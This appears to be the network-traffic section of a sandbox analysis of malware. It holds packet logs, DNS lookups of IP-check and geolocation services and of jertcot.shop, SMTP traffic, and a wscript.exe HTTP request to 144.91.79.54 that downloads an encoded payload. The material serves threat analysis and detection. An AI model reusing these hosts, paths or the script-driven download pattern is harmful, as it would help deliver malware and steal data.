                                                            Nov 18, 2024 13:43:01.272934914 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.272965908 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:01.272969961 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.273008108 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.273040056 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:01.273041964 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.273078918 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.273094893 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:01.273113966 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.273149014 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.273163080 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:01.273188114 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.273240089 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:01.273603916 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.273642063 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.273679972 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.273684978 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:01.322093010 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:01.390345097 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.390377045 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.390389919 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.390403032 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.390428066 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:01.390459061 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:01.390491009 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.390501976 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.390556097 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:01.390918016 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.390938044 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.390949965 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.391041994 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:01.391125917 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.391139030 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.391149998 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.391163111 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:01.391207933 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:01.391370058 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.391428947 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.391441107 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.391488075 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:01.391666889 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.391714096 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:01.391719103 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.391731977 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.391766071 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:01.391777039 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.392127037 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.392172098 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:01.392173052 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.447114944 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:01.509344101 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.509363890 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.509382010 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.509404898 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.509429932 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.509443045 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.509458065 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.509596109 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:01.509849072 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.509860992 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.509872913 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.509907007 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:01.509934902 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:01.509951115 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.509989977 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.510003090 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.510026932 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:01.510096073 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.510108948 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.510143995 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:01.510524035 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.510575056 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:01.510586023 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.510600090 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.510641098 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:01.510826111 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.510838985 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.510852098 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.510876894 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:01.556441069 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:01.628189087 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.628226995 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.628237009 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.628248930 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.628269911 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.628314972 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.628326893 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.628424883 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:01.628426075 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:01.628631115 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.628674984 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:01.628689051 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.628703117 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.628746986 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:01.628747940 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.628958941 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.629000902 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:01.629007101 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.629019976 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.629051924 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.629055023 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:01.629354954 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.629400015 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:01.629403114 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.629414082 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.629458904 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:01.629626036 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.629676104 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.629687071 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.629720926 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.629723072 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:01.629766941 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:01.630076885 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.630088091 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.630124092 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:01.747256041 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.747339964 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.747355938 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.747370005 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.747381926 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.747395992 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.747421026 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:01.747476101 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:01.747476101 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:01.747641087 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.747682095 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.747709990 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.747725010 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:01.747797966 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.747811079 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.747843981 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:01.748111963 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.748123884 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.748136997 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.748157978 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:01.748182058 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:01.748334885 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.748357058 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.748368979 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.748399019 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:01.748456955 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.748469114 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.748498917 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:01.748857021 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.748897076 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.748900890 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:01.748909950 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.748951912 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:01.749109030 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.749164104 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.749206066 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:01.867003918 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.867047071 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.867064953 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.867089033 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.867100000 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:01.867101908 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.867115021 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.867131948 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.867149115 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:01.867177963 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:01.867188931 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.867221117 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.867243052 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:01.867309093 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.867351055 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:01.867360115 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.867372036 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.867413044 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:01.867448092 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.867460966 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.867471933 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.867499113 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:01.867826939 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.867880106 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:01.867885113 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.867898941 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.867939949 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:01.867973089 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.867986917 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.867999077 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.868037939 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:02.004076004 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:02.009617090 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:02.256324053 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:02.306307077 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:07.392915010 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:07.392995119 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:07.395422935 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:07.400291920 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:11.715672970 CET4973180192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:11.721014023 CET8049731144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:11.721141100 CET4973180192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:11.721355915 CET4973180192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:11.726912975 CET8049731144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:12.774035931 CET8049731144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:12.784064054 CET8049731144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:12.784209967 CET4973180192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:13.125910997 CET4973180192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:13.126266956 CET4973280192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:13.131124973 CET8049732144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:13.131225109 CET4973280192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:13.131273031 CET8049731144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:13.131362915 CET4973180192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:13.131473064 CET4973280192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:13.136298895 CET8049732144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:13.991144896 CET8049732144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:13.991180897 CET8049732144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:13.991195917 CET8049732144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:13.991210938 CET8049732144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:13.991287947 CET4973280192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:13.991349936 CET4973280192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:16.146226883 CET4973280192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:44:22.164302111 CET4988380192.168.2.4193.122.6.168
                                                            Nov 18, 2024 13:44:22.169222116 CET8049883193.122.6.168192.168.2.4
                                                            Nov 18, 2024 13:44:22.169301033 CET4988380192.168.2.4193.122.6.168
                                                            Nov 18, 2024 13:44:22.169620037 CET4988380192.168.2.4193.122.6.168
                                                            Nov 18, 2024 13:44:22.174422026 CET8049883193.122.6.168192.168.2.4
                                                            Nov 18, 2024 13:44:23.024297953 CET8049883193.122.6.168192.168.2.4
                                                            Nov 18, 2024 13:44:23.032669067 CET4988380192.168.2.4193.122.6.168
                                                            Nov 18, 2024 13:44:23.037662029 CET8049883193.122.6.168192.168.2.4
                                                            Nov 18, 2024 13:44:23.277934074 CET8049883193.122.6.168192.168.2.4
                                                            Nov 18, 2024 13:44:23.299393892 CET49889443192.168.2.4188.114.96.3
                                                            Nov 18, 2024 13:44:23.299474001 CET44349889188.114.96.3192.168.2.4
                                                            Nov 18, 2024 13:44:23.299748898 CET49889443192.168.2.4188.114.96.3
                                                            Nov 18, 2024 13:44:23.310167074 CET49889443192.168.2.4188.114.96.3
                                                            Nov 18, 2024 13:44:23.310204983 CET44349889188.114.96.3192.168.2.4
                                                            Nov 18, 2024 13:44:23.322025061 CET4988380192.168.2.4193.122.6.168
                                                            Nov 18, 2024 13:44:23.515419006 CET8049883193.122.6.168192.168.2.4
                                                            Nov 18, 2024 13:44:23.515479088 CET4988380192.168.2.4193.122.6.168
                                                            Nov 18, 2024 13:44:24.129654884 CET44349889188.114.96.3192.168.2.4
                                                            Nov 18, 2024 13:44:24.129753113 CET49889443192.168.2.4188.114.96.3
                                                            Nov 18, 2024 13:44:24.140805006 CET49889443192.168.2.4188.114.96.3
                                                            Nov 18, 2024 13:44:24.140831947 CET44349889188.114.96.3192.168.2.4
                                                            Nov 18, 2024 13:44:24.141144991 CET44349889188.114.96.3192.168.2.4
                                                            Nov 18, 2024 13:44:24.196966887 CET49889443192.168.2.4188.114.96.3
                                                            Nov 18, 2024 13:44:24.340946913 CET49889443192.168.2.4188.114.96.3
                                                            Nov 18, 2024 13:44:24.383328915 CET44349889188.114.96.3192.168.2.4
                                                            Nov 18, 2024 13:44:24.478779078 CET44349889188.114.96.3192.168.2.4
                                                            Nov 18, 2024 13:44:24.478857040 CET44349889188.114.96.3192.168.2.4
                                                            Nov 18, 2024 13:44:24.478908062 CET49889443192.168.2.4188.114.96.3
                                                            Nov 18, 2024 13:44:24.681183100 CET49889443192.168.2.4188.114.96.3
                                                            Nov 18, 2024 13:44:30.042268991 CET4988380192.168.2.4193.122.6.168
                                                            Nov 18, 2024 13:44:30.047431946 CET8049883193.122.6.168192.168.2.4
                                                            Nov 18, 2024 13:44:30.289416075 CET8049883193.122.6.168192.168.2.4
                                                            Nov 18, 2024 13:44:30.313124895 CET49932587192.168.2.4162.254.34.31
                                                            Nov 18, 2024 13:44:30.318278074 CET58749932162.254.34.31192.168.2.4
                                                            Nov 18, 2024 13:44:30.318358898 CET49932587192.168.2.4162.254.34.31
                                                            Nov 18, 2024 13:44:30.337620020 CET4988380192.168.2.4193.122.6.168
                                                            Nov 18, 2024 13:44:31.160269022 CET58749932162.254.34.31192.168.2.4
                                                            Nov 18, 2024 13:44:31.160506010 CET49932587192.168.2.4162.254.34.31
                                                            Nov 18, 2024 13:44:31.165551901 CET58749932162.254.34.31192.168.2.4
                                                            Nov 18, 2024 13:44:31.343144894 CET58749932162.254.34.31192.168.2.4
                                                            Nov 18, 2024 13:44:31.344428062 CET49932587192.168.2.4162.254.34.31
                                                            Nov 18, 2024 13:44:31.349576950 CET58749932162.254.34.31192.168.2.4
                                                            Nov 18, 2024 13:44:31.524661064 CET58749932162.254.34.31192.168.2.4
                                                            Nov 18, 2024 13:44:31.524997950 CET49932587192.168.2.4162.254.34.31
                                                            Nov 18, 2024 13:44:31.529823065 CET58749932162.254.34.31192.168.2.4
                                                            Nov 18, 2024 13:44:31.722270012 CET58749932162.254.34.31192.168.2.4
                                                            Nov 18, 2024 13:44:31.722564936 CET49932587192.168.2.4162.254.34.31
                                                            Nov 18, 2024 13:44:31.729398012 CET58749932162.254.34.31192.168.2.4
                                                            Nov 18, 2024 13:44:31.912738085 CET58749932162.254.34.31192.168.2.4
                                                            Nov 18, 2024 13:44:31.913013935 CET49932587192.168.2.4162.254.34.31
                                                            Nov 18, 2024 13:44:31.917990923 CET58749932162.254.34.31192.168.2.4
                                                            Nov 18, 2024 13:44:32.096177101 CET58749932162.254.34.31192.168.2.4
                                                            Nov 18, 2024 13:44:32.097791910 CET49932587192.168.2.4162.254.34.31
                                                            Nov 18, 2024 13:44:32.102757931 CET58749932162.254.34.31192.168.2.4
                                                            Nov 18, 2024 13:44:32.277010918 CET58749932162.254.34.31192.168.2.4
                                                            Nov 18, 2024 13:44:32.277651072 CET49932587192.168.2.4162.254.34.31
                                                            Nov 18, 2024 13:44:32.277728081 CET49932587192.168.2.4162.254.34.31
                                                            Nov 18, 2024 13:44:32.277754068 CET49932587192.168.2.4162.254.34.31
                                                            Nov 18, 2024 13:44:32.277776957 CET49932587192.168.2.4162.254.34.31
                                                            Nov 18, 2024 13:44:32.277796984 CET49932587192.168.2.4162.254.34.31
                                                            Nov 18, 2024 13:44:32.282905102 CET58749932162.254.34.31192.168.2.4
                                                            Nov 18, 2024 13:44:32.282953024 CET58749932162.254.34.31192.168.2.4
                                                            Nov 18, 2024 13:44:32.283010006 CET58749932162.254.34.31192.168.2.4
                                                            Nov 18, 2024 13:44:32.283039093 CET58749932162.254.34.31192.168.2.4
                                                            Nov 18, 2024 13:44:32.283067942 CET58749932162.254.34.31192.168.2.4
                                                            Nov 18, 2024 13:44:32.470141888 CET58749932162.254.34.31192.168.2.4
                                                            Nov 18, 2024 13:44:32.525125980 CET49932587192.168.2.4162.254.34.31
                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Nov 18, 2024 13:44:22.144922972 CET5602053192.168.2.41.1.1.1
                                                            Nov 18, 2024 13:44:22.152060986 CET53560201.1.1.1192.168.2.4
                                                            Nov 18, 2024 13:44:23.289596081 CET6407453192.168.2.41.1.1.1
                                                            Nov 18, 2024 13:44:23.298178911 CET53640741.1.1.1192.168.2.4
                                                            Nov 18, 2024 13:44:30.299009085 CET5929453192.168.2.41.1.1.1
                                                            Nov 18, 2024 13:44:30.312438965 CET53592941.1.1.1192.168.2.4
                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                            Nov 18, 2024 13:44:22.144922972 CET192.168.2.41.1.1.10x1429Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                            Nov 18, 2024 13:44:23.289596081 CET192.168.2.41.1.1.10x9dc9Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                            Nov 18, 2024 13:44:30.299009085 CET192.168.2.41.1.1.10xd817Standard query (0)jertcot.shopA (IP address)IN (0x0001)false
                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                            Nov 18, 2024 13:44:22.152060986 CET1.1.1.1192.168.2.40x1429No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                            Nov 18, 2024 13:44:22.152060986 CET1.1.1.1192.168.2.40x1429No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                            Nov 18, 2024 13:44:22.152060986 CET1.1.1.1192.168.2.40x1429No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                            Nov 18, 2024 13:44:22.152060986 CET1.1.1.1192.168.2.40x1429No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                            Nov 18, 2024 13:44:22.152060986 CET1.1.1.1192.168.2.40x1429No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                            Nov 18, 2024 13:44:22.152060986 CET1.1.1.1192.168.2.40x1429No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                            Nov 18, 2024 13:44:23.298178911 CET1.1.1.1192.168.2.40x9dc9No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                            Nov 18, 2024 13:44:23.298178911 CET1.1.1.1192.168.2.40x9dc9No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                            Nov 18, 2024 13:44:30.312438965 CET1.1.1.1192.168.2.40xd817No error (0)jertcot.shop162.254.34.31A (IP address)IN (0x0001)false
                                                            • reallyfreegeoip.org
                                                            • 144.91.79.54
                                                            • checkip.dyndns.org
                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.449730144.91.79.54807064C:\Windows\System32\wscript.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 18, 2024 13:42:58.911454916 CET152OUTGET /1211/s HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Accept: */*
                                                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                            Host: 144.91.79.54
                                                            Nov 18, 2024 13:42:59.776099920 CET1236INHTTP/1.1 200 OK
                                                            Date: Mon, 18 Nov 2024 12:42:59 GMT
                                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                            Last-Modified: Wed, 02 Oct 2024 01:26:13 GMT
                                                            ETag: "6ab0-6237452d358f3"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 27312
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Data Raw: 33 44 33 44 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 [TRUNCATED]
